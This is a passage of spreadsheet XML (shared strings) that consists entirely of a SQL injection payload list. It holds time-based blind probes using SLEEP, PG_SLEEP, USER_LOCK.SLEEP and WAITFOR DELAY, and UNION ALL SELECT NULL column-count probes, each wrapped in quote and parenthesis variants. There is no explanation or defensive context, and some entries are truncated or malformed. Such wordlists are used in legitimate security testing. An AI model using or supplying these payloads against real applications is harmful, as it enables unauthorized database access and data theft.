    <t>"; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND "cCqW" = "cCqW</t>
  </si>
  <si>
    <t>" ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND  ( "BfeF" LIKE "Bf</t>
  </si>
  <si>
    <t>"  )  )  ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (  "tYsU" LIKE "</t>
  </si>
  <si>
    <t>"  )  )   ) ; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND   (  (   ( "ILwH" LIKE</t>
  </si>
  <si>
    <t>"; BEGIN USER_LOCK.SLEEP ( 5 ) ; END;-- AND "MUpP" LIKE "MUpP</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND SLEEP ( 5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">' )  AND SLEEP ( 5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">' AND SLEEP ( 5 ) </t>
  </si>
  <si>
    <t xml:space="preserve">" AND SLEEP ( 5 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND SLEEP ( 5 )  AND  ( 9113 = 9113</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND SLEEP ( 5 )  AND   (  (  9007 = 9007</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND SLEEP ( 5 )  AND   (  (   ( 848 = 848</t>
  </si>
  <si>
    <t xml:space="preserve"> AND SLEEP ( 5 ) </t>
  </si>
  <si>
    <t>' )  AND SLEEP ( 5 )  AND  ( 'Dnru' = 'Dnru</t>
  </si>
  <si>
    <t>'  )  )   AND SLEEP ( 5 )  AND   (  (  'zbCg' = 'zbCg</t>
  </si>
  <si>
    <t>'  )  )   )  AND SLEEP ( 5 )  AND   (  (   ( 'gpfJ' = 'gpfJ</t>
  </si>
  <si>
    <t>' AND SLEEP ( 5 )  AND 'UBCu' = 'UBCu</t>
  </si>
  <si>
    <t>' )  AND SLEEP ( 5 )  AND  ( 'oFaX' LIKE 'oFaX</t>
  </si>
  <si>
    <t>'  )  )   AND SLEEP ( 5 )  AND   (  (  'ISUS' LIKE 'ISUS</t>
  </si>
  <si>
    <t>'  )  )   )  AND SLEEP ( 5 )  AND   (  (   ( 'wvIN' LIKE 'wvIN</t>
  </si>
  <si>
    <t>' AND SLEEP ( 5 )  AND 'YyqV' LIKE 'YyqV</t>
  </si>
  <si>
    <t>" )  AND SLEEP ( 5 )  AND  ( "jEqL" = "jEqL</t>
  </si>
  <si>
    <t>"  )  )   AND SLEEP ( 5 )  AND   (  (  "xKbs" = "xKbs</t>
  </si>
  <si>
    <t>"  )  )   )  AND SLEEP ( 5 )  AND   (  (   ( "ttGZ" = "ttGZ</t>
  </si>
  <si>
    <t>" AND SLEEP ( 5 )  AND "fhez" = "fhez</t>
  </si>
  <si>
    <t>" )  AND SLEEP ( 5 )  AND  ( "xctR" LIKE "xctR</t>
  </si>
  <si>
    <t>"  )  )   AND SLEEP ( 5 )  AND   (  (  "OlrA" LIKE "OlrA</t>
  </si>
  <si>
    <t>"  )  )   )  AND SLEEP ( 5 )  AND   (  (   ( "dcMZ" LIKE "dcMZ</t>
  </si>
  <si>
    <t>" AND SLEEP ( 5 )  AND "TVHw" LIKE "TVHw</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND SLEEP ( 5 ) --</t>
  </si>
  <si>
    <t>' )  AND SLEEP ( 5 ) --</t>
  </si>
  <si>
    <t>' AND SLEEP ( 5 ) --</t>
  </si>
  <si>
    <t>" AND SLEEP ( 5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND SLEEP ( 5 ) --  AND  ( 9080 = 9080</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND SLEEP ( 5 ) --  AND   (  (  5694 = 5694</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND SLEEP ( 5 ) --  AND   (  (   ( 2542 = 2542</t>
  </si>
  <si>
    <t xml:space="preserve"> AND SLEEP ( 5 ) --</t>
  </si>
  <si>
    <t>' )  AND SLEEP ( 5 ) --  AND  ( 'qIbN' = 'qIbN</t>
  </si>
  <si>
    <t>'  )  )   AND SLEEP ( 5 ) --  AND   (  (  'YBpK' = 'YBpK</t>
  </si>
  <si>
    <t>'  )  )   )  AND SLEEP ( 5 ) --  AND   (  (   ( 'atDr' = 'atDr</t>
  </si>
  <si>
    <t>' AND SLEEP ( 5 ) --  AND 'SBEY' = 'SBEY</t>
  </si>
  <si>
    <t>' )  AND SLEEP ( 5 ) --  AND  ( 'lBTj' LIKE 'lBTj</t>
  </si>
  <si>
    <t>'  )  )   AND SLEEP ( 5 ) --  AND   (  (  'qkKN' LIKE 'qkKN</t>
  </si>
  <si>
    <t>'  )  )   )  AND SLEEP ( 5 ) --  AND   (  (   ( 'suST' LIKE 'suST</t>
  </si>
  <si>
    <t>' AND SLEEP ( 5 ) --  AND 'mRjq' LIKE 'mRjq</t>
  </si>
  <si>
    <t>" )  AND SLEEP ( 5 ) --  AND  ( "OhnK" = "OhnK</t>
  </si>
  <si>
    <t>"  )  )   AND SLEEP ( 5 ) --  AND   (  (  "OGuO" = "OGuO</t>
  </si>
  <si>
    <t>"  )  )   )  AND SLEEP ( 5 ) --  AND   (  (   ( "KCuo" = "KCuo</t>
  </si>
  <si>
    <t>" AND SLEEP ( 5 ) --  AND "pKMf" = "pKMf</t>
  </si>
  <si>
    <t>" )  AND SLEEP ( 5 ) --  AND  ( "fusY" LIKE "fusY</t>
  </si>
  <si>
    <t>"  )  )   AND SLEEP ( 5 ) --  AND   (  (  "mrKG" LIKE "mrKG</t>
  </si>
  <si>
    <t>"  )  )   )  AND SLEEP ( 5 ) --  AND   (  (   ( "QKXG" LIKE "QKXG</t>
  </si>
  <si>
    <t>" AND SLEEP ( 5 ) --  AND "Exkz" LIKE "Exkz</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">' )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">' AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">" AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND  ( 85 = 85</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (  1690 = 1690</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (   ( 745 = 745</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )  </t>
  </si>
  <si>
    <t>' )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND  ( 'UVKz' = 'UVKz</t>
  </si>
  <si>
    <t>'  )  )   AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (  'xWkv' = xWkv</t>
  </si>
  <si>
    <t>'  )  )   )  AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (   ( 'VkOS</t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (  'YXAW' </t>
  </si>
  <si>
    <t>' AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND 'iTKz' LIKE</t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (  "qPTj" = </t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND   (  (  "HyfF" </t>
  </si>
  <si>
    <t>" AND 9263 =  ( SELECT 9263 FROM PG_SLEEP ( 5  )  )   AND "LcvP" LIKE</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  --</t>
  </si>
  <si>
    <t>' )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  --</t>
  </si>
  <si>
    <t>' AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  --</t>
  </si>
  <si>
    <t>" AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  -- AND   (  (   ( 9098</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 4301 =  ( SELECT 4301 FROM PG_SLEEP ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> )  WAITFOR DELAY '0:0:5'--</t>
  </si>
  <si>
    <t>' )  WAITFOR DELAY '0:0:5'--</t>
  </si>
  <si>
    <t>' WAITFOR DELAY '0:0:5'--</t>
  </si>
  <si>
    <t>" WAITFOR DELAY '0:0:5'--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  WAITFOR DELAY '0:0:5'-- AND  ( 6480 = 6480</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   WAITFOR DELAY '0:0:5'-- AND   (  (  5102 = 5102</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  WAITFOR DELAY '0:0:5'-- AND   (  (   ( 1548 = 1548</t>
  </si>
  <si>
    <t xml:space="preserve"> WAITFOR DELAY '0:0:5'--</t>
  </si>
  <si>
    <t>' )  WAITFOR DELAY '0:0:5'-- AND  ( 'XgfU' = 'XgfU</t>
  </si>
  <si>
    <t>'  )  )   WAITFOR DELAY '0:0:5'-- AND   (  (  'qHAe' = 'qHAe</t>
  </si>
  <si>
    <t>'  )  )   )  WAITFOR DELAY '0:0:5'-- AND   (  (   ( 'XCMr' = 'XCMr</t>
  </si>
  <si>
    <t>' WAITFOR DELAY '0:0:5'-- AND 'fMVM' = 'fMVM</t>
  </si>
  <si>
    <t>' )  WAITFOR DELAY '0:0:5'-- AND  ( 'DoCU' LIKE 'DoCU</t>
  </si>
  <si>
    <t>'  )  )   WAITFOR DELAY '0:0:5'-- AND   (  (  'iEsy' LIKE 'iEsy</t>
  </si>
  <si>
    <t>'  )  )   )  WAITFOR DELAY '0:0:5'-- AND   (  (   ( 'uuEA' LIKE 'uuEA</t>
  </si>
  <si>
    <t>' WAITFOR DELAY '0:0:5'-- AND 'KTBx' LIKE 'KTBx</t>
  </si>
  <si>
    <t>" )  WAITFOR DELAY '0:0:5'-- AND  ( "Ibit" = "Ibit</t>
  </si>
  <si>
    <t>"  )  )   WAITFOR DELAY '0:0:5'-- AND   (  (  "TpgQ" = "TpgQ</t>
  </si>
  <si>
    <t>"  )  )   )  WAITFOR DELAY '0:0:5'-- AND   (  (   ( "ZMhe" = "ZMhe</t>
  </si>
  <si>
    <t>" WAITFOR DELAY '0:0:5'-- AND "EsLL" = "EsLL</t>
  </si>
  <si>
    <t>" )  WAITFOR DELAY '0:0:5'-- AND  ( "bnsK" LIKE "bnsK</t>
  </si>
  <si>
    <t>"  )  )   WAITFOR DELAY '0:0:5'-- AND   (  (  "VGfF" LIKE "VGfF</t>
  </si>
  <si>
    <t>"  )  )   )  WAITFOR DELAY '0:0:5'-- AND   (  (   ( "krJV" LIKE "krJV</t>
  </si>
  <si>
    <t>" WAITFOR DELAY '0:0:5'-- AND "aapI" LIKE "aapI</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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UNION ALL SELECT NULL#</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL#</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL# AND  ( 3154 = 3154</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL# AND  ( 3852 = 3852</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL# AND  ( 6391 = 6391</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( 5970 = 5970</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  6751 = 6751</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  8786 = 8786</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  2838 = 28</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( 6490 = 6490</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( 5144 = 5144</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( 2621 = </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL# AND  ( 'ALYr' = 'ALYr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL# AND  ( 'WYGb' = 'WYGb</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL# AND  ( 'REKv' = 'REKv</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( 'lZum' = '</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL# AND   (  (  'viQf' = 'viQf</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  'jSef' = 'jSef</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  'fLNk' = 'fLNk</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  'EHkP'</t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  </t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# </t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( 'YbIT' = 'YbIT</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( 'jTOk' = 'jTOk</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL# AND 'Taiv' = 'Taiv</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL# AND 'VHcb' = 'VHcb</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL# AND 'YyQs' = 'YyQs</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL# AND  ( 'mnTW' LIKE 'mnTW</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL# AND  ( 'isBs' LIKE 'isBs</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL# AND   (  (  'WomE' LIKE 'WomE</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  'xcDo' LIKE 'xcDo</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  'KZcv'</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( 'okQW' LIKE 'okQW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL# AND 'byXh' LIKE 'byXh</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL# AND 'Eobt' LIKE 'Eobt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL# AND  ( "mfOy" = "mfOy</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL# AND  ( "SZvx" = "SZvx</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL# AND  ( "jaHo" = "jaHo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( "eOdb" = "</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL# AND   (  (  "qjIC" = "qjIC</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  "POVn" = "POVn</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  "mpCV" = "mpCV</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  "TZeM" = mpCV</t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# </t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( "aVfm" = "aVfm</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( "pPUz" = "pPUz</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL#</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL# AND "DbEL" = "DbEL</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL# AND "YbEp" = "YbEp</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL# AND "VQKt" = "VQKt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL# AND  ( "wuBS" LIKE "wuBS</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL# AND  ( "FwOT" LIKE "FwOT</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL# AND   (  (  "FlHZ" LIKE "FlHZ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  "Nwvv" LIKE "Nwvv</t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  "bQCa" LIKE </t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  "MzKt"</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( "VlNp" LIKE "VlNp</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL# AND "fJtf" LIKE "fJtf</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL# AND "kqfi" LIKE "kqfi</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL# AND  ( 102 = 102</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL# AND  ( 8535 = 8535</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL# AND  ( 4 = 4</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( 1597 = 1597</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL# AND   (  (  1018 = 1018</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  6232 = 6232</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  5688 = 5688</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( 9606 = 9606</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (   ( 2686 = </t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL# AND   (  (  </t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL# </t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL# AND  ( 'DxCD' = 'DxCD</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL# AND  ( 'aNaP' = 'aNaP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL# AND  ( 'KKGP' = 'KKGP</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( 'kwql' = 'kwql</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL# AND   (  (  'BuQi' = 'BuQi</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  'ZzMY' = 'ZzMY</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  'mbDn' = 'mbDn</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  'fpvf' = 'fpvf</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( 'rxUo' = 'rxUo</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( 'nZwi' = 'nZwi</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( 'TguG' = 'TguG</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL# AND 'eUyE' = 'eUyE</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL# AND 'jioc' = 'jioc</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL# AND 'nvZi' = 'nvZi</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL# AND  ( 'OrsO' LIKE 'OrsO</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL# AND  ( 'wcyL' LIKE 'wcyL</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL# AND  ( 'Ichb' LIKE 'Ichb</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL# AND   (  (  'XZes' LIKE 'XZes</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  'WPnL' LIKE 'WPnL</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  'suQA' LIKE 'suQA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL# AND   (  (  'QURi' LIKE 'QURi</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( 'mvvE' LIKE 'mvvE</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( 'crTV' LIKE 'crTV</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( 'Jrrv' LIKE 'Jrrv</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL# AND 'qdhV' LIKE 'qdhV</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL# AND 'ZJaU' LIKE 'ZJaU</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL# AND  ( "Cwyf" = "Cwyf</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL# AND  ( "lIYY" = "lIYY</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL# AND  ( "jJOt" = "jJOt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL# AND  ( "nnEq" = "</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL# AND   (  (  "iHRe" = "iHRe</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  "sYnz" = "sYnz</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL# AND   (  (  "jIZd" = "jIZd</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( "ihHc" = "ihHc</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( "ZbQF" = "ZbQF</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL# AND   (  (   ( "tHYO" = "tH</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL# AND "qWul" = "qWul</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL# AND "CEIb" = "CEIb</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL# AND "PIGp" = "PIGp</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL# AND  ( "MPyS" LIKE "MPyS</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL# AND  ( "RhHI" LIKE "RhHI</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL# AND   (  (  "pBPJ" LIKE "pBPJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL# AND   (  (  "VnAf" LIKE "VnAf</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL# AND   (  (   ( "wzYK" LIKE "wzYK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL# AND   (  (   ( "oLKw" LIKE "oLKw</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL# AND "BgKE" LIKE "BgKE</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>' )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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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UNION ALL SELECT NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL--</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL-- AND  ( 4945 = 4945</t>
  </si>
  <si>
